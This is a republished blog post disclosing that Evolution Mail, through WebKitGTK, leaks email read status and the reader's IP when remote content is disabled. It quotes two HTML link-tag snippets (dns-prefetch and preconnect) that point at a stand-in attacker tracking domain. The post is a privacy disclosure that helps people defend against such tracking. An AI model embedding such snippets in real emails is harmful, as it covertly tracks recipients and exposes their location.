![[Designed for Microsoft Surface] Cable Matters Desk Mount for Microsoft Surface…](https://techcratic.com/wp-content/uploads/2025/07/517TT-COFQL._AC_SL1500_-360x180.jpg)
2025-07-09 13:26:00
www.grepular.com
Evolution Mail’s “Load Remote Content” option, as a privacy protection feature doesn’t work. They know it doesn’t work. It hasn’t worked for years and there is no sign it will be fixed any time soon.
I discovered the other day that if a HTML email contains a tag like:
rel="dns-prefetch" href="https://trackingcode.attackersdomain.example.com">
Then when an email is opened in Evolution Mail, a DNS request for trackingcode.attackersdomain.example.com is performed. This happens with remote content disabled, and without clicking the button to fetch it. The sender can look at their DNS logs to see if you’ve read your email, and the IP address of your DNS resolver at that time, which may indicate your location.
I opened a bug report with Evolution Mail, and they blamed WebKitGTK for this situation and have closed my ticket as a duplicate of another ticket which was opened in April 2024. That ticket reported a different but similar bug:
href="trackingcode.attackersdomain.example.com" rel="preconnect">
This apparently triggers a connection when you read an email, even without clicking to load remote content. An attacker could look at the SNI header during the TLS negotiation to identify the unique reader of such an email, and it would grant them their IP address.
This one links back to a webkit bug which was opened in August 2023, which also suggests there will be other such leaks, and which shows no sign of being dealt with.
I suggested that maintaining a whitelist of allowed html tags and attributes, and stripping them before passing the email html onto a web browser would be a good defense in depth strategy, but this looks unlikely to be followed.
So my suggestion is: If you care about having privacy when reading your email, uninstall Evolution Mail. It doesn’t protect your privacy, and the devs don’t consider that to be their responsibility.
Want to leave a tip?
You can follow this Blog using or Mastodon. To read more, visit my blog index.
Keep your files stored safely and securely with the SanDisk 2TB Extreme Portable SSD. With over 69,505 ratings and an impressive 4.6 out of 5 stars, this product has been purchased over 8K+ times in the past month. At only $129.99, this Amazon’s Choice product is a must-have for secure file storage.
Help keep private content private with the included password protection featuring 256-bit AES hardware encryption. Order now for just $129.99 on Amazon!
Help Power Techcratic’s Future – Scan To Support
If Techcratic’s content and insights have helped you, consider giving back by supporting the platform with crypto. Every contribution makes a difference, whether it’s for high-quality content, server maintenance, or future updates. Techcratic is constantly evolving, and your support helps drive that progress.
As a solo operator who wears all the hats, creating content, managing the tech, and running the site, your support allows me to stay focused on delivering valuable resources. Your support keeps everything running smoothly and enables me to continue creating the content you love. I’m deeply grateful for your support, it truly means the world to me! Thank you!
BITCOIN
bc1qlszw7elx2qahjwvaryh0tkgg8y68enw30gpvge Scan the QR code with your crypto wallet app |
DOGECOIN
D64GwvvYQxFXYyan3oQCrmWfidf6T3JpBA Scan the QR code with your crypto wallet app |
ETHEREUM
0xe9BC980DF3d985730dA827996B43E4A62CCBAA7a Scan the QR code with your crypto wallet app |
Please read the Privacy and Security Disclaimer on how Techcratic handles your support.
Disclaimer: As an Amazon Associate, Techcratic may earn from qualifying purchases.
